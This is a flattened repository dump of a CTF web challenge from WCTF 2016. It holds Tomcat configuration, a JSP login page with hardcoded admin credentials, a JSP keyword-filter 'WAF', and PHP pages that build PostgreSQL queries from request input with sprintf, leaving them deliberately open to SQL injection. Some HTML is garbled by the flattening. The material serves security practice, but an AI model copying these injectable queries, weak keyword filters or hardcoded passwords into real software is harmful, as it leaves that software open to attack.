15 | // grant codeBase "file:${catalina.base}/webapps/examples/-" { 16 | // permission java.net.SocketPermission "dbhost.mycompany.com:5432", "connect"; 17 | // permission java.net.SocketPermission "*.noaa.gov:80", "connect"; 18 | // }; 19 | // 20 | // The permissions granted to the context WEB-INF/classes directory 21 | // grant codeBase "file:${catalina.base}/webapps/examples/WEB-INF/classes/-" { 22 | // }; 23 | // 24 | // The permission granted to your JDBC driver 25 | // grant codeBase "jar:file:${catalina.base}/webapps/examples/WEB-INF/lib/driver.jar!/-" { 26 | // permission java.net.SocketPermission "dbhost.mycompany.com:5432", "connect"; 27 | // }; 28 | // The permission granted to the scrape taglib 29 | // grant codeBase "jar:file:${catalina.base}/webapps/examples/WEB-INF/lib/scrape.jar!/-" { 30 | // permission java.net.SocketPermission "*.noaa.gov:80", "connect"; 31 | // }; 32 | 33 | -------------------------------------------------------------------------------- /wctf-2016/BlackBox/tomcat8/conf/tomcat-users.xml: -------------------------------------------------------------------------------- 1 | 2 | 18 |WEB-INF/web.xml 24 |${catalina.base}/conf/web.xml 25 | 26 | 27 | 30 | 31 | 33 | 36 |22 | 23 | 24 | 34 | -------------------------------------------------------------------------------- /wctf-2016/BlackBox/tomcat8/lib/commons-codec-1.10.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/wctf-2016/BlackBox/tomcat8/lib/commons-codec-1.10.jar -------------------------------------------------------------------------------- /wctf-2016/BlackBox/tomcat8/webapps/ROOT/META-INF/context.xml: -------------------------------------------------------------------------------- 1 |25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 3 | -------------------------------------------------------------------------------- 
/wctf-2016/BlackBox/tomcat8/webapps/login/META-INF/MANIFEST.MF: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Created-By: 1.8.0_03-Ubuntu (Oracle Corporation) 3 | 4 | -------------------------------------------------------------------------------- /wctf-2016/BlackBox/tomcat8/webapps/login/META-INF/war-tracker: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/wctf-2016/BlackBox/tomcat8/webapps/login/META-INF/war-tracker -------------------------------------------------------------------------------- /wctf-2016/BlackBox/tomcat8/webapps/login/index.jsp: -------------------------------------------------------------------------------- 1 | <%@ page import="java.io.*,java.util.*" %> 2 | <% 3 | response.setContentType("application/json; charset=UTF-8"); 4 | Base64.Decoder decoder = Base64.getDecoder(); 5 | String username = request.getParameter("username"); 6 | String password = request.getParameter("password"); 7 | 8 | if ( username != null && password != null ) { 9 | if (username.equals("admin") && password.equals("12345678")){ 10 | out.println("{\"msg\": \"congrats, login ok. 
But did you really need to login?\"}"); 11 | } else { 12 | out.println("{\"msg\":\"login failed\"}"); 13 | } 14 | } else { 15 | out.println("{\"msg\":\"nothing happened\"}"); 16 | } 17 | %> -------------------------------------------------------------------------------- /wctf-2016/BlackBox/tomcat8/webapps/waf/META-INF/MANIFEST.MF: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Created-By: 1.8.0_03-Ubuntu (Oracle Corporation) 3 | 4 | -------------------------------------------------------------------------------- /wctf-2016/BlackBox/tomcat8/webapps/waf/META-INF/war-tracker: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/wctf-2016/BlackBox/tomcat8/webapps/waf/META-INF/war-tracker -------------------------------------------------------------------------------- /wctf-2016/BlackBox/tomcat8/webapps/waf/index.jsp: -------------------------------------------------------------------------------- 1 | <%@ page import="java.io.*,java.util.*,org.apache.commons.codec.binary.Base64" %> 2 | <% 3 | 4 | 5 | String error_msg = "{\"msg\": \"illegal\"}"; 6 | String success_msg = "{\"msg\": \"legal\"}"; 7 | 8 | response.setContentType("application/json; charset=UTF-8"); 9 | // Base64.Decoder decoder = Base64.getDecoder(); 10 | 11 | 12 | 13 | 14 | String query = request.getParameter("query"); 15 | 16 | String filter[] = { 17 | "extractvalue", 18 | "updatexml", 19 | "select", 20 | "union", 21 | "from", 22 | "and", 23 | "or", 24 | "'", 25 | }; 26 | 27 | if ( query != null ){ 28 | try { 29 | Boolean flag = false; 30 | query = new String(Base64.decodeBase64(query), "UTF-8"); 31 | // check illigal 32 | for(int i=0; i -------------------------------------------------------------------------------- /wctf-2016/BlackBox/waf.war: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/wctf-2016/BlackBox/waf.war -------------------------------------------------------------------------------- /wctf-2016/BlackBox/www/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Black Box 9 | 10 | 11 | 12 | 13 |14 | 15 | 16 | 39 | 40 | 41 |51 | 52 | 53 | 54 | 55 | -------------------------------------------------------------------------------- /wctf-2016/BlackBox/www/news.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |42 |49 | 50 |Black Box Testing
43 |This website is full of old tricks :( If you love web hacking and need more and more incredible web tricks, join HITCON CTF 2016 this year!
44 |
45 |46 | HITCON CTF » 47 |
48 |Black Box 9 | 10 | 28 | 29 | 30 | 31 | 32 |33 | 34 | 35 | 58 | 59 | 60 |76 | 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /wctf-2016/BlackBox/www/news/index.php: -------------------------------------------------------------------------------- 1 | msg == "legal"){ 21 | $res = pg_query(sprintf("SELECT * FROM news WHERE id='%s'", $id)); 22 | $result = pg_fetch_object($res); 23 | 24 | @pg_query(sprintf("UPDATE news SET hits=hits+1 WHERE id='%s'", $id)); 25 | 26 | if ($result) { 27 | echo json_encode($result); 28 | } else { 29 | echo json_encode(array("msg"=>"nothing happened")); 30 | } 31 | } else { 32 | echo json_encode($data); 33 | } 34 | } else { 35 | $res = pg_query("SELECT * FROM news"); 36 | 37 | $result = array(); 38 | while ($data = pg_fetch_object($res)){ 39 | $result[] = $data; 40 | } 41 | 42 | echo json_encode($result); 43 | } 44 | 45 | 46 | 47 | // $r = pg_query($_POST[sql]) or die( pg_last_error() ); 48 | // print_r( pg_fetch_object($r) ); 49 | // CREATE TABLE news( id SERIAL PRIMARY KEY, title text NOT NULL, content text NOT NULL, hits int NOT NULL ); 50 | // INSERT INTO news(title, content, hits) values('Hello Wolrd:)', 'This is a example news content.',1) 51 | -------------------------------------------------------------------------------- /wctf-2016/BlackBox/www/show.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |61 |74 | 75 |News
62 |What happened today?
63 |
64 |65 |
66 |
72 | 73 |67 | 71 |# 68 |TITLE 69 |HITS 70 |Black Box 9 | 10 | 29 | 30 | 31 | 32 | 33 |34 | 35 | 36 | 59 | 60 | 61 |65 | 66 | 67 | 68 | 69 | -------------------------------------------------------------------------------- /wctf-2016/BlackBox/www/waf/index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /wctf-2016/BlackBox/www/www_backup_for_poc_ctf_and_you_cant_guess_it_59cffc9547c828b5.tgz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/wctf-2016/BlackBox/www/www_backup_for_poc_ctf_and_you_cant_guess_it_59cffc9547c828b5.tgz --------------------------------------------------------------------------------62 |63 | 64 |